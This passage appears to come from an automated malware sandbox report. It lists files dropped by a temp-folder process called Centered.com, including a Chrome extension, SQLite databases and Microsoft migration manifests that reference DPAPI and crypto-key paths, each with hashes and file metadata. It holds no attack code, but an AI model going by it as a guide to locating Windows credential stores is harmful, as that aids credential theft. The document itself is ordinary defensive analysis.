                                                                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4814
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                      MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                      SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                      SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                      SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4533
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                                      MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                                      SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                                      SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                                      SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4814
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.909739359753065
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                                                                                                                                                                                                                                      MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                                                                                                                                                                                                                                      SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                                                                                                                                                                                                                                      SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                                                                                                                                                                                                                                      SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2062
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.925445222257812
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                                                                                                                                                                                                                                      MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                                                                                                                                                                                                                                      SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                                                                                                                                                                                                                                      SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                                                                                                                                                                                                                                      SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.96984082363901
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                                                                                                                                                                                                                                      MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                                                                                                                                                                                                                                      SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                                                                                                                                                                                                                                      SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                                                                                                                                                                                                                                      SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3019
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.884926762491409
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
                                                                                                                                                                                                                                                                                      MD5:63F04FB9936532B21E616E88E3EBED14
                                                                                                                                                                                                                                                                                      SHA1:56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
                                                                                                                                                                                                                                                                                      SHA-256:61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
                                                                                                                                                                                                                                                                                      SHA-512:66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4309
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.059776328378613
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
                                                                                                                                                                                                                                                                                      MD5:3A9306662FE93D09B05B9AE44128BCF1
                                                                                                                                                                                                                                                                                      SHA1:77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
                                                                                                                                                                                                                                                                                      SHA-256:1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
                                                                                                                                                                                                                                                                                      SHA-512:DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\* [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                                                      MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                                                      SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                                                      SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                                                      SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8193
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                                                      MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                                                      SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                                                      SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                                                      SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10219
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.966520026409024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                                                      MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                                                      SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                                                      SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                                                      SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2829
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.130068712095974
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                                                                                                                                                                                                                                      MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                                                                                                                                                                                                                                      SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                                                                                                                                                                                                                                      SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                                                                                                                                                                                                                                      SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9370
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                                      MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                                      SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                                      SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                                      SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                                      Malicious:false
